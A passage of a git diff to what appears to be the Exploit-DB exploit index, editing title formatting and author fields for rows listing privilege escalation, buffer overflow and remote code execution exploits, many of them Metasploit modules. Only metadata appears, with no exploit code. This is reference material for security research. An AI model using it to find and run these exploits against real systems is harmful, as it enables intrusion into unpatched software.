10.10.x - GateKeeper Bypass",2015-01-29,"Amplia Security Research",osx,local,0 -35935,platforms/windows/local/35935.py,"UniPDF 1.1 - Crash PoC (SEH overwritten)",2015-01-29,bonze,windows,local,0 35936,platforms/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Privilege Escalation (MS14-070)",2015-01-29,KoreLogic,windows,local,0 35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0 35962,platforms/windows/local/35962.c,"Trend Micro Multiple Products 8.0.1133 - Privilege Escalation",2015-01-31,"Parvez Anwar",windows,local,0 @@ -8448,7 +8448,6 @@ id,file,description,date,author,platform,type,port 36310,platforms/lin_x86-64/local/36310.txt,"Linux Kernel (x86-64) - Rowhammer Privilege Escalation (PoC)",2015-03-09,"Google Security Research",lin_x86-64,local,0 36311,platforms/lin_x86-64/local/36311.txt,"Rowhammer - NaCl Sandbox Escape (PoC)",2015-03-09,"Google Security Research",lin_x86-64,local,0 36327,platforms/windows/local/36327.txt,"Microsoft Windows XP/7 Kernel - 'win32k.sys' Keyboard Layout Privilege Escalation (MS10-073)",2011-11-22,instruder,windows,local,0 -36388,platforms/linux/local/36388.py,"Brasero CD/DVD Burner 3.4.1 - 'm3u' Buffer Overflow Crash (PoC)",2015-03-16,"Avinash Thapa",linux,local,0 36390,platforms/windows/local/36390.txt,"Foxit Reader 7.0.6.1126 - Unquoted Service Path Elevation Of Privilege",2015-03-16,LiquidWorm,windows,local,0 36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0 36424,platforms/windows/local/36424.txt,"Microsoft Windows 8.1 - Local WebDAV NTLM Reflection Elevation of Privilege",2015-03-19,"Google Security Research",windows,local,0 @@ -8475,7 +8474,6 @@ id,file,description,date,author,platform,type,port 36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 - '.wav' SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0 36827,platforms/windows/local/36827.py,"Free MP3 CD Ripper 2.6 2.8 - '.wav' SEH Based Buffer Overflow (Windows 7 DEP Bypass)",2015-04-24,naxxo,windows,local,0 36837,platforms/windows/local/36837.rb,"Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0 -36841,platforms/windows/local/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)",2015-04-27,"Avinash Thapa",windows,local,0 37065,platforms/windows/local/37065.txt,"Comodo GeekBuddy < 4.18.121 - Privilege Escalation",2015-05-20,"Jeremy Brown",windows,local,0 36855,platforms/linux/local/36855.py,"Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition Privilege Escalation",2015-04-29,"Ben Sheppard",linux,local,0 36859,platforms/windows/local/36859.txt,"Foxit Reader PDF 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",windows,local,0 @@ -8488,7 +8486,7 @@ id,file,description,date,author,platform,type,port 36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - Buffer Overflow",2015-05-11,evil_comrade,windows,local,0 36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - Buffer Overflow",2015-05-11,evil_comrade,windows,local,0 37049,platforms/windows/local/37049.txt,"Microsoft Windows - Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,windows,local,0 -37052,platforms/windows/local/37052.c,"Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0 +37052,platforms/windows/local/37052.c,"Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass (PoC) (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0 37056,platforms/windows/local/37056.py,"BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass)",2015-05-18,"Gabor Seljan",windows,local,0 37064,platforms/win_x86-64/local/37064.py,"Microsoft Windows 8.0/8.1 (x64) - 'TrackPopupMenu' Privilege Escalation (MS14-058)",2015-05-19,ryujin,win_x86-64,local,0 37088,platforms/linux/local/37088.c,"Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation",2015-05-23,rebel,linux,local,0 @@ -8547,7 +8545,7 @@ id,file,description,date,author,platform,type,port 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0 38138,platforms/osx/local/38138.txt,"Apple Mac OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0 -40975,platforms/android/local/40975.rb,"Android - get_user/put_user Exploit (Metasploit)",2016-12-29,Metasploit,android,local,0 +40975,platforms/android/local/40975.rb,"Google Android - get_user/put_user Exploit (Metasploit)",2016-12-29,Metasploit,android,local,0 38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite (SEH) Buffer Overflow",2015-09-15,Un_N0n,windows,local,0 38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 38199,platforms/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)",2015-09-15,"Google Security Research",windows,local,0 @@ -8677,7 +8675,7 @@ id,file,description,date,author,platform,type,port 39694,platforms/windows/local/39694.txt,"Microsoft Excel - Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",windows,local,0 39702,platforms/linux/local/39702.rb,"Exim - 'perl_startup' Privilege Escalation (Metasploit)",2016-04-15,Metasploit,linux,local,0 39967,platforms/linux/local/39967.txt,"SolarWinds Virtualization Manager - Privilege Escalation",2016-06-16,"Nate Kettlewell",linux,local,0 -39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / Server 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0 +39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0 39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0 39734,platforms/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",linux,local,0 39741,platforms/osx/local/39741.txt,"Mach Race OSX - Privilege Escalation",2016-04-27,fG!,osx,local,0 @@ -8691,7 +8689,7 @@ id,file,description,date,author,platform,type,port 39791,platforms/multiple/local/39791.rb,"ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit)",2016-05-09,Metasploit,multiple,local,0 39803,platforms/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",windows,local,0 39804,platforms/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 < 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",windows,local,0 -39809,platforms/windows/local/39809.cs,"Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0 +39809,platforms/windows/local/39809.cs,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0 39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack Based Overflow",2016-05-13,"Juan Sacco",linux,local,0 39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0 39814,platforms/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0 @@ -8880,15 +8878,12 @@ id,file,description,date,author,platform,type,port 41605,platforms/windows/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation",2017-03-15,ReWolf,windows,local,0 41607,platforms/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",windows,local,0 41619,platforms/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,windows,local,0 -41675,platforms/android/local/41675.rb,"Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,android,local,0 -41681,platforms/multiple/local/41681.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit) (2)",2015-06-23,Metasploit,multiple,local,0 -41682,platforms/multiple/local/41682.rb,"Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)",2013-08-06,Metasploit,multiple,local,0 +41675,platforms/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,android,local,0 41683,platforms/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,multiple,local,0 41700,platforms/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,windows,local,0 41701,platforms/windows/local/41701.rb,"Malwarebytes Anti-Malware < 2.0.3 / Anti-Exploit < 1.03.1.1220 - Update Remote Code Execution (Metasploit)",2014-12-16,Metasploit,windows,local,0 41702,platforms/windows/local/41702.rb,"Microsoft Silverlight - ScriptObject Unsafe Memory Access (MS13-022/MS13-087) (Metasploit)",2013-03-12,Metasploit,windows,local,0 41704,platforms/windows/local/41704.rb,"EMC Replication Manager < 5.3 - Command Execution (Metasploit)",2011-02-27,Metasploit,windows,local,0 -41705,platforms/windows/local/41705.rb,"MOXA MediaDBPlayback - ActiveX Control Buffer Overflow (Metasploit)",2010-10-19,Metasploit,windows,local,0 41706,platforms/windows/local/41706.rb,"Microsoft Office - OLE Multiple DLL Side Loading Vulnerabilities (MS15-132/MS16-014/MS16-025/MS16-041/MS16-070) (Metasploit)",2015-12-08,Metasploit,windows,local,0 41707,platforms/windows/local/41707.rb,"CA Arcserve D2D - GWT RPC Credential Information Disclosure (Metasploit)",2011-07-25,Metasploit,windows,local,0 41708,platforms/windows/local/41708.rb,"Lenovo System Update - Privilege Escalation (Metasploit)",2015-04-12,Metasploit,windows,local,0 @@ -8896,7 +8891,6 @@ id,file,description,date,author,platform,type,port 41710,platforms/windows/local/41710.rb,"HP Intelligent Management Center < 5.0 E0102 - UAM Buffer Overflow (Metasploit)",2012-08-29,Metasploit,windows,local,0 41711,platforms/windows/local/41711.rb,"VMware Host Guest Client Redirector - DLL Side Loading (Metasploit)",2016-08-06,Metasploit,windows,local,0 41712,platforms/windows/local/41712.rb,"CADA 3S CoDeSys Gateway Server - Directory Traversal (Metasploit)",2013-02-02,Metasploit,windows,local,0 -41713,platforms/windows/local/41713.rb,"MOXA Device Manager Tool 2.1 - Buffer Overflow (Metasploit)",2010-10-20,Metasploit,windows,local,0 41721,platforms/win_x86-64/local/41721.c,"Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Privilege Escalation",2017-03-25,sickness,win_x86-64,local,0 41722,platforms/win_x86-64/local/41722.c,"Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Privilege Escalation",2017-03-25,sickness,win_x86-64,local,0 41745,platforms/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",hardware,local,0 @@ -8978,7 +8972,7 @@ id,file,description,date,author,platform,type,port 102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 - Backup Remote Code Execution",2003-09-20,anonymous,linux,remote,617 103,platforms/windows/remote/103.c,"Microsoft Windows - 'RPC DCOM2' Remote Exploit (MS03-039)",2003-09-20,Flashsky,windows,remote,135 105,platforms/bsd/remote/105.pl,"GNU CFEngine 2.-2.0.3 - Remote Stack Overflow",2003-09-27,kokanin,bsd,remote,5308 -107,platforms/linux/remote/107.c,"ProFTPd 1.2.9rc2 - ASCII File Remote Code Execution",2003-10-04,bkbll,linux,remote,21 +107,platforms/linux/remote/107.c,"ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution (1)",2003-10-04,bkbll,linux,remote,21 109,platforms/windows/remote/109.c,"Microsoft Windows - 'RPC2' Universal Exploit / Denial of Service (RPC3) (MS03-039)",2003-10-09,anonymous,windows,remote,135 110,platforms/linux/remote/110.c,"ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force",2003-10-13,Haggis,linux,remote,21 112,platforms/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow",2003-10-21,blasty,windows,remote,0 @@ -9263,11 +9257,11 @@ id,file,description,date,author,platform,type,port 1139,platforms/linux/remote/1139.c,"Ethereal 10.x - AFP Protocol Dissector Remote Format String",2005-08-06,vade79,linux,remote,0 1144,platforms/windows/remote/1144.html,"Microsoft Internet Explorer - 'blnmgr.dll' COM Object Remote Exploit (MS05-038)",2005-08-09,FrSIRT,windows,remote,0 1146,platforms/windows/remote/1146.c,"Microsoft Windows - Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139 -1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec - Remote File Access Exploit (Windows) (Metasploit)",2005-08-11,anonymous,windows,remote,10000 +1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec - Remote File Access Exploit (Windows) (Metasploit)",2005-08-11,Metasploit,windows,remote,10000 1149,platforms/windows/remote/1149.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445 -1150,platforms/windows/remote/1150.pm,"Novell ZENworks 6.5 - Desktop/Server Management Remote Stack Overflow (Metasploit)",2005-08-12,anonymous,windows,remote,1761 -1151,platforms/windows/remote/1151.pm,"MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) (1)",2005-08-12,anonymous,windows,remote,143 -1152,platforms/windows/remote/1152.pm,"Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit)",2005-08-12,anonymous,windows,remote,8008 +1150,platforms/windows/remote/1150.pm,"Novell ZENworks 6.5 - Desktop/Server Management Remote Stack Overflow (Metasploit)",2005-08-12,Metasploit,windows,remote,1761 +1151,platforms/windows/remote/1151.pm,"MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit)",2005-08-12,Metasploit,windows,remote,143 +1152,platforms/windows/remote/1152.pm,"Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit)",2005-08-12,Metasploit,windows,remote,8008 1167,platforms/solaris/remote/1167.pm,"Solaris 10 LPD - Arbitrary File Delete Exploit (Metasploit)",2005-08-19,Optyx,solaris,remote,0 1171,platforms/linux/remote/1171.c,"Elm < 2.5.8 - (Expires Header) Remote Buffer Overflow",2005-08-22,c0ntex,linux,remote,0 1178,platforms/windows/remote/1178.c,"Microsoft IIS 5.0 - '500-100.asp' Server Name Spoof Exploit",2005-08-25,Lympex,windows,remote,0 @@ -9341,7 +9335,7 @@ id,file,description,date,author,platform,type,port 1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 (OSX) - location.QueryInterface() Code Execution (Metasploit)",2006-02-08,"H D Moore",osx,remote,0 1486,platforms/linux/remote/1486.c,"Power Daemon 2.0.2 - (WHATIDO) Remote Format String",2006-02-10,"Gotfault Security",linux,remote,532 1487,platforms/linux/remote/1487.c,"OpenVMPSd 1.3 - Remote Format String",2006-02-10,"Gotfault Security",linux,remote,1589 -1502,platforms/windows/remote/1502.py,"Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow PoC (MS06-005) (2)",2006-02-16,redsand,windows,remote,0 +1502,platforms/windows/remote/1502.py,"Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow (PoC) (MS06-005) (2)",2006-02-16,redsand,windows,remote,0 1504,platforms/windows/remote/1504.pm,"Microsoft Windows Media Player 9 - Plugin Overflow (MS06-006) (Metasploit)",2006-02-17,"H D Moore",windows,remote,0 1505,platforms/windows/remote/1505.html,"Microsoft Windows Media Player 10 - Plugin Overflow (MS06-006)",2006-02-17,"Matthew Murphy",windows,remote,0 1506,platforms/windows/remote/1506.c,"Microsoft Windows - Color Management Module Overflow (MS05-036) (2)",2006-02-17,darkeagle,windows,remote,0 @@ -9361,9 +9355,9 @@ id,file,description,date,author,platform,type,port 1620,platforms/windows/remote/1620.pm,"Microsoft Internet Explorer - (createTextRang) Remote Exploit (Metasploit)",2006-04-01,"Randy Flood",windows,remote,0 1626,platforms/windows/remote/1626.pm,"PeerCast 0.1216 - Remote Buffer Overflow (Metasploit)",2006-03-30,"H D Moore",windows,remote,7144 1628,platforms/windows/remote/1628.cpp,"Microsoft Internet Explorer - (createTextRang) Download Shellcode Exploit (2)",2006-03-31,ATmaCA,windows,remote,0 -1664,platforms/windows/remote/1664.py,"Ultr@VNC 1.0.1 - client Log::ReallyPrint Buffer Overflow",2006-04-11,"Paul Haas",windows,remote,0 +1664,platforms/windows/remote/1664.py,"Ultr@VNC 1.0.1 - 'client Log::ReallyPrint' Buffer Overflow",2006-04-11,"Paul Haas",windows,remote,0 1679,platforms/novell/remote/1679.pm,"Novell Messenger Server 2.0 - 'Accept-Language' Remote Overflow (Metasploit)",2006-04-15,"H D Moore",novell,remote,8300 -1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow (Metasploit)",2006-04-15,anonymous,windows,remote,8080 +1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow (Metasploit)",2006-04-15,Metasploit,windows,remote,8080 1703,platforms/windows/remote/1703.pl,"Symantec Scan Engine 5.0.x - Change Admin Password Remote Exploit",2006-04-21,"Marc Bevand",windows,remote,8004 1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - Long GET Request Remote Buffer Overflow",2006-04-25,c0d3r,linux,remote,0 1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server 4.1.2 - 'parse_xml.cgi' Code Execution",2003-02-24,FOX_MULDER,osx,remote,0 @@ -9449,8 +9443,8 @@ id,file,description,date,author,platform,type,port 2743,platforms/windows/remote/2743.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (1)",2006-11-08,anonymous,windows,remote,0 2749,platforms/windows/remote/2749.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (2)",2006-11-10,~Fyodor,windows,remote,0 2753,platforms/windows/remote/2753.c,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (3)",2006-11-10,M03,windows,remote,0 -2770,platforms/windows/remote/2770.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (1)",2006-11-13,"H D Moore",windows,remote,0 -2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (1)",2006-11-13,"H D Moore",windows,remote,0 +2770,platforms/windows/remote/2770.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit)",2006-11-13,"H D Moore",windows,remote,0 +2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)",2006-11-13,"H D Moore",windows,remote,0 2784,platforms/multiple/remote/2784.html,"Links 1.00pre12 - (smbclient) Remote Code Execution",2006-11-14,"Teemu Salmela",multiple,remote,0 2785,platforms/windows/remote/2785.c,"WinZip 10.0.7245 - (FileView ActiveX) Remote Buffer Overflow",2006-11-15,prdelka,windows,remote,0 2789,platforms/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)",2006-11-16,cocoruder,windows,remote,0 @@ -9469,7 +9463,7 @@ id,file,description,date,author,platform,type,port 2951,platforms/multiple/remote/2951.sql,"Oracle 9i / 10g (extproc) - Local / Remote Command Execution",2006-12-19,"Marco Ivaldi",multiple,remote,0 2959,platforms/linux/remote/2959.sql,"Oracle 9i / 10g - File System Access via utl_file Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0 2974,platforms/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Traversal",2006-12-21,str0ke,windows,remote,0 -3021,platforms/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution",2003-10-15,"Solar Eclipse",linux,remote,21 +3021,platforms/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution (2)",2003-10-15,"Solar Eclipse",linux,remote,21 3022,platforms/windows/remote/3022.txt,"Microsoft Windows - ASN.1 Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445 3037,platforms/windows/remote/3037.php,"Durian Web Application Server 3.02 - Remote Buffer Overflow",2006-12-29,rgod,windows,remote,4002 3055,platforms/windows/remote/3055.html,"WinZip 10.0 - FileView ActiveX Controls Remote Overflow",2006-12-31,XiaoHui,windows,remote,0 @@ -9592,7 +9586,7 @@ id,file,description,date,author,platform,type,port 3880,platforms/windows/remote/3880.html,"Sienzo Digital Music Mentor 2.6.0.4 - SetEvalExpiryDate Overwrite (SEH)",2007-05-09,"Parveen Vashishtha",windows,remote,0 3881,platforms/windows/remote/3881.html,"Sienzo Digital Music Mentor 2.6.0.4 - SetEvalExpiryDate EIP Overwrite",2007-05-09,"Parveen Vashishtha",windows,remote,0 3882,platforms/windows/remote/3882.html,"Barcodewiz ActiveX Control 2.52 - 'Barcodewiz.dll' Overwrite (SEH)",2007-05-09,"Parveen Vashishtha",windows,remote,0 -3892,platforms/windows/remote/3892.html,"Microsoft Internet Explorer 7 - Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0 +3892,platforms/windows/remote/3892.html,"Microsoft Internet Explorer 7 - Arbitrary File Rewrite (PoC) (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0 3893,platforms/windows/remote/3893.c,"McAfee Security Center IsOldAppInstalled - ActiveX Buffer Overflow",2007-05-10,Jambalaya,windows,remote,0 3899,platforms/windows/remote/3899.html,"Morovia Barcode ActiveX Professional 3.3.1304 - Arbitrary File Overwrite",2007-05-11,shinnai,windows,remote,0 3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Request Remote Buffer Overflow",2007-05-12,vade79,windows,remote,8080 @@ -9696,7 +9690,7 @@ id,file,description,date,author,platform,type,port 4348,platforms/windows/remote/4348.c,"PPStream - 'PowerPlayer.dll 2.0.1.3829' ActiveX Remote Overflow",2007-08-31,dummy,windows,remote,0 4351,platforms/windows/remote/4351.html,"Yahoo! Messenger - 'YVerInfo.dll 2007.8.27.1' ActiveX Buffer Overflow",2007-09-01,minhbq,windows,remote,0 4357,platforms/windows/remote/4357.html,"Telecom Italy Alice Messenger - Remote Registry Key Manipulation Exploit",2007-09-03,rgod,windows,remote,0 -4360,platforms/windows/remote/4360.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (1)",2007-09-03,"Patrick Webster",windows,remote,0 +4360,platforms/windows/remote/4360.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit)",2007-09-03,"Patrick Webster",windows,remote,0 4362,platforms/linux/remote/4362.pl,"Web Oddity Web Server 0.09b - Directory Traversal",2007-09-04,Katatafish,linux,remote,0 4366,platforms/windows/remote/4366.html,"GlobalLink 2.7.0.8 - 'glItemCom.dll' SetInfo() Heap Overflow",2007-09-05,void,windows,remote,0 4367,platforms/windows/remote/4367.c,"Trend Micro ServerProtect - 'eng50.dll' Remote Stack Overflow",2007-09-06,devcode,windows,remote,0 @@ -9813,7 +9807,7 @@ id,file,description,date,author,platform,type,port 5078,platforms/windows/remote/5078.htm,"Backup Exec System Recovery Manager 7.0.1 - Arbitrary File Upload",2008-02-07,titon,windows,remote,0 5079,platforms/win_x86/remote/5079.c,"SapLPD 6.28 (Windows x86) - Remote Buffer Overflow",2008-02-07,BackBone,win_x86,remote,515 5087,platforms/windows/remote/5087.html,"Microsoft DirectSpeechSynthesis Module - Remote Buffer Overflow",2008-02-09,rgod,windows,remote,0 -5100,platforms/windows/remote/5100.html,"ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow",2008-02-10,Elazar,windows,remote,0 +5100,platforms/windows/remote/5100.html,"ImageStation - 'SonyISUpload.cab' 1.0.0.38 ActiveX Buffer Overflow",2008-02-10,Elazar,windows,remote,0 5102,platforms/windows/remote/5102.html,"FaceBook PhotoUploader 5.0.14.0 - Remote Buffer Overflow",2008-02-12,"MC Group Ltd.",windows,remote,0 5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client - 'WFICA.OCX' ActiveX Heap Buffer Overflow",2008-02-12,Elazar,windows,remote,0 5111,platforms/windows/remote/5111.html,"IBM Domino Web Access Upload Module - Overwrite (SEH)",2008-02-13,Elazar,windows,remote,0 @@ -9895,7 +9889,7 @@ id,file,description,date,author,platform,type,port 6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,windows,remote,80 6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0 6100,platforms/win_x86/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,win_x86,remote,80 -6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow",2008-07-22,"Guido Landi",windows,remote,0 +6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow",2008-07-22,"Guido Landi",windows,remote,0 6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 - (server header) Remote Code Execution",2008-07-22,Koshi,windows,remote,0 6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (C)",2008-07-23,r0ut3r,windows,remote,0 6122,platforms/multiple/remote/6122.rb,"BIND 9.4.1 < 9.4.2 - Remote DNS Cache Poisoning Flaw Exploit (Metasploit)",2008-07-23,I)ruid,multiple,remote,0 @@ -9981,7 +9975,7 @@ id,file,description,date,author,platform,type,port 7167,platforms/windows/remote/7167.html,"Exodus 0.10 - (URI handler) Arbitrary Parameter Injection (2)",2008-11-20,Nine:Situations:Group,windows,remote,0 7181,platforms/windows/remote/7181.html,"KVIrc 3.4.2 Shiny - (URI handler) Remote Command Execution",2008-11-21,Nine:Situations:Group,windows,remote,0 7183,platforms/linux/remote/7183.txt,"verlihub 0.9.8d-RC2 - Remote Command Execution",2008-11-21,v4lkyrius,linux,remote,0 -7196,platforms/windows/remote/7196.html,"Microsoft XML Core Services DTD - Cross-Domain Scripting PoC (MS08-069)",2008-11-23,"Jerome Athias",windows,remote,0 +7196,platforms/windows/remote/7196.html,"Microsoft XML Core Services DTD - Cross-Domain Scripting (PoC) (MS08-069)",2008-11-23,"Jerome Athias",windows,remote,0 7355,platforms/windows/remote/7355.txt,"NULL FTP Server 1.1.0.7 - Site Parameters Command Injection",2008-12-05,"Tan Chew Keong",windows,remote,0 7384,platforms/windows/remote/7384.txt,"XAMPP 1.6.8 - Cross-Site Request Forgery (Change Administrative Password)",2008-12-08,"Michael Brooks",windows,remote,0 7389,platforms/hardware/remote/7389.htm,"DD-WRT v24-sp1 - Cross-Site Reference Forgery",2008-12-08,"Michael Brooks",hardware,remote,0 @@ -10047,7 +10041,7 @@ id,file,description,date,author,platform,type,port 8059,platforms/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption (PoC)",2009-02-16,Nine:Situations:Group,windows,remote,0 8079,platforms/windows/remote/8079.html,"Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)",2009-02-20,Abysssec,windows,remote,0 8080,platforms/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002) (Python)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0 -8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption PoC (MS09-002)",2009-02-20,webDEViL,windows,remote,0 +8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (PoC) (MS09-002)",2009-02-20,webDEViL,windows,remote,0 8096,platforms/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting Attack",2009-02-23,"Rizki Wicaksono",hardware,remote,0 8097,platforms/multiple/remote/8097.txt,"MLdonkey 2.9.7 - Arbitrary File Disclosure",2009-02-23,"Michael Peselnik",multiple,remote,0 8117,platforms/windows/remote/8117.pl,"POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow (SEH)",2009-02-27,"Jeremy Brown",windows,remote,0 @@ -10122,7 +10116,7 @@ id,file,description,date,author,platform,type,port 8732,platforms/windows/remote/8732.py,"httpdx 0.5b - FTP Server (CWD) Remote Buffer Overflow (SEH)",2009-05-19,His0k4,windows,remote,21 8733,platforms/windows/remote/8733.html,"AOL IWinAmpActiveX Class ConvertFile() - Remote Buffer 